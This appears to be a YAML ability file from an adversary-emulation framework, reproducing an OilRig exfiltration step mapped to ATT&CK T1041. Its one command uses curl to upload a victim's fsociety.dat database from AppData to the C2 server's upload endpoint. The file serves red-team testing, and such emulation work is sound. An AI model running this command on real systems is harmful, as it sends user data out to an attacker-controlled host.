ability_id: 021245dd-c0be-4900-bd6c-1c680f00a237
access: {}
additional_info: {}
buckets:
- exfiltration
delete_payload: true
description: Exfil the SQLite database fsociety.dat created by b.exe
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: 'curl -F "data=@C:\Users\#{initial.target.user}\AppData\Roaming\fsociety.dat"
    --header "X-Request-ID: #{initial.target.user}-#{paw}" #{server}/file/upload'
  language: null
  name: cmd
  parsers: []
  payloads: []
  platform: windows
  timeout: 60
  uploads: []
  variations: []
name: OilRig Exfil fsociety.dat
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: exfiltration
technique_id: T1041
technique_name: Exfiltration Over C2 Channel
